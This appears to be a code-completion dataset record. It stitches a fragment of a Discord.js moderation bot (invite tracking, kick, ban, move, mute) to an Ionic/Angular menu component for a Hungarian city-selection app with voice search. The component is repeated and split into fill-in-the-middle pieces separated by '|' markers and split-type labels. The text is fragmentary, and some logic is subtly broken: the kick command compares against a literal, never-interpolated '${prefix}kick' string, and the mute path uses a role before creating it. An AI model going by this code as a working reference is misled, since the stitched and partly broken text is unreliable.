.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => `**__${roles.name}__ |**`).join(` `)
let id = new Discord.RichEmbed()
.setColor('RANDOM')
.setTitle(':clipboard: | User identity info')
.setAuthor(message.author.username,message.author.avatarURL)
.addField('• Name :', message.author.username,true)
.addField('• Tag :', message.author.discriminator,true)
.addField('• ID :', message.author.id,true)
// note: requires the 'moment' package (not required anywhere in this snippet)
.addField('• JoinedAt :', moment(message.member.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• CreatedAt :', moment(message.author.createdAt).format('D/M/YYYY h:mm a '),true)
.addField('• Total invites :', inviteCount,true)
.addField('• Roles :', roles)
.setTimestamp()
message.channel.sendEmbed(id).then(c => {
c.react('📋')
})
})
}
});
var prefix = "$"
client.on("message", (message) => {
if (message.content.startsWith("${prefix}kick")) {
if(!message.member.hasPermission('KICK_MEMBERS')) return message.reply('? ماعندك الصلاحيات');
var member= message.mentions.members.first();
member.kick().then((member) => {
message.channel.send(member.displayName + " مع السلامه :wave: ");
}).catch(() => {
message.channel.send("Error -_-");
});
}
});
var prefix = "$"
client.on('message', message => {
if (message.author.bot) return;
if (!message.content.startsWith(prefix)) return;
let command = message.content.split(" ")[0];
command = command.slice(prefix.length);
let args = message.content.split(" ").slice(1);
if (command == "ban") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.guild.member(message.author).hasPermission("BAN_MEMBERS")) return message.reply("**You Don't Have ` BAN_MEMBERS ` Permission**");
if(!message.guild.member(client.user).hasPermission("BAN_MEMBERS")) return message.reply("**I Don't Have ` BAN_MEMBERS ` Permission**");
let user = message.mentions.users.first();
let reason = message.content.split(" ").slice(2).join(" ");
/*let bErenaalog = client.channels.find("name", "Erenaa-log");
if(!bErenaalog) return message.reply("I've detected that this server doesn't have a Erenaa-log text channel.");*/
if (message.mentions.users.size < 1) return message.reply("**منشن شخص**");
if(!reason) return message.reply ("**اكتب سبب الطرد**");
if (!message.guild.member(user)
.bannable) return message.reply("**لايمكنني طرد شخص اعلى من رتبتي يرجه اعطاء البوت رتبه عالي**");
message.guild.member(user).ban(7, user);
const banembed = new Discord.RichEmbed()
.setAuthor(`BANNED!`, user.displayAvatarURL)
.setColor("RANDOM")
.setTimestamp()
.addField("**User:**", '**[ ' + `${user.tag}` + ' ]**')
.addField("**By:**", '**[ ' + `${message.author.tag}` + ' ]**')
.addField("**Reason:**", '**[ ' + `${reason}` + ' ]**')
message.channel.send({
embed : banembed
})
}
});
client.on('message', message => {
if(!message.channel.guild) return;
if(message.content.startsWith(prefix + 'move')) {
if (message.member.hasPermission("MOVE_MEMBERS")) {
if (message.mentions.users.size === 0) {
return message.channel.send("``لاستخدام الأمر اكتب هذه الأمر : " +prefix+ "move [USER]``")
}
if (message.member.voiceChannel != null) {
if (message.mentions.members.first().voiceChannel != null) {
var authorchannel = message.member.voiceChannelID;
var usermentioned = message.mentions.members.first().id;
var embed = new Discord.RichEmbed()
.setTitle("Succes!")
.setColor("#000000")
.setDescription(`لقد قمت بسحب <@${usermentioned}> الى الروم الصوتي الخاص بك✅ `)
var embed = new Discord.RichEmbed()
.setTitle(`You are Moved in ${message.guild.name}`)
.setColor("RANDOM")
.setDescription(`**<@${message.author.id}> Moved You To His Channel!\nServer --> ${message.guild.name}**`)
message.guild.members.get(usermentioned).setVoiceChannel(authorchannel).then(m => message.channel.send(embed))
message.guild.members.get(usermentioned).send(embed)
} else {
message.channel.send("``لا تستطيع سحب "+ message.mentions.members.first() +" `يجب ان يكون هذه العضو في روم صوتي`")
}
} else {
message.channel.send("**``يجب ان تكون في روم صوتي لكي تقوم بسحب العضو أليك``**")
}
} else {
message.react("❌")
}}});
const ms = require("ms");
client.on("message", message => {
if(!message.channel.guild) return;
if (message.author.bot) return;
let command = message.content.split(" ")[0];
if (message.content.split(" ")[0].toLowerCase() === prefix + "unmute") {
if (!message.member.hasPermission('MANAGE_ROLES')) return;
let user = message.mentions.users.first();
let modlog = client.channels.find('name', 'log');
let muteRole = client.guilds.get(message.guild.id).roles.find('name', 'Muted');
if (!muteRole) return message.reply(" I Can’t Find 'Muted' Role ").catch(console.error).then(message => message.delete(4000))
if (message.mentions.users.size < 1) return message.reply(' Error : ``Mention a User``').catch(console.error).then(message => message.delete(4000))
if (!message.guild.member(client.user).hasPermission('MANAGE_ROLES_OR_PERMISSIONS')) return;
if (message.guild.member(user).removeRole(muteRole.id)) {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
} else {
message.guild.member(user).removeRole(muteRole).then(() => {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
});
}
};
});
client.on('message',function(message) {
if(!message.channel.guild) return; let messageArray = message.content.split(' ');
let muteRole = message.guild.roles.find('name', 'Muted');
let muteMember = message.mentions.members.first();
let muteReason = messageArray[2];
let muteDuration = messageArray[3];
if (message.content.split(" ")[0].toLowerCase() === prefix + "mute") {
if (message.author.bot) return;
if(!muteRole) return message.guild.createRole({name: 'Muted'}).then(message.guild.channels.forEach(chan => chan.overwritePermissions(muteRole, {SEND_MESSAGES:false,ADD_REACTIONS:false})));
if(!message.guild.member(message.author).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : You Need `` MANAGE_ROLES ``Permission ');
if(!message.guild.member(client.user).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : I Don’t Have `` MANAGE_ROLES ``Permission ');
if(!muteMember) return message.channel.send(' Error : ``Mention a User``').then(message => message.delete(4000))
if(!muteReason) return message.channel.send(' Error : ``Supply a Reason``').then(message => message.delete(4000))
if(!muteDuration) return message.channel.send(' Error : `` Supply Mute Time `` \n Ex: #mute @user reason 1m ').then(message => message.delete(4000))
if(!muteDuration.match(/[1-7][s,m,h,d,w]/g)) return message.channel.send(' Error : `` Invalid Mute Duration``').then(message => message.delete(4000))
message.channel.send(`${muteMember} Has Been Muted.`).then(message => message.delete(5000))
muteMember.addRole(muteRole);
muteMember.setMute(true)
.then(() => { setTimeout(() => {
muteMember.removeRole(muteRole)
muteMember.setMute(false)
}, ms(muteDuration));
});
}
});
client.login(process.env.BOT_TOKEN); | random_line_split |
|
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to access Mic
// *********************************************************
ask | {
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
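// readJsonData() assumes assets/i18n/languages.json has the shape
// { "languages": [ { "name": "<display name>", "value": "<stored key>" }, ... ] },
// since getItems() filters on item.name and tempCall() persists item.value
// under the 'language' storage key (used here as the selected city).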
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2");
this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh();
});
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
}
| Permission()
| identifier_name |
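The settings, language and template handlers in the component above all follow the same persist-then-reload pattern: write the new value with @ionic/storage, drop the cached 'last_config', and send the app back to the root URL so it reinitializes. Below is a minimal sketch of that flow using async/await instead of the nested .then() callbacks; the helper name applyLanguage is illustrative and not part of the component.

import { Storage } from '@ionic/storage';

// Sketch only: persist the selection, invalidate the cached remote config,
// then force a full reload, mirroring what tempCall()/refresh() do above.
export async function applyLanguage(storage: Storage, value: string): Promise<void> {
  await storage.set('language', value);   // persist the user's choice
  await storage.remove('last_config');    // drop the cached configuration
  location.href = '/';                    // full reload, as refresh() does
}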
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask user permission to access the mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
| else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show a listening prompt while the user talks
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
}
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show result of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
this.storage.get("language").then((language) => {
this.CityName = language;
console.log(this.CityName);
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2");
this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh();
});
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
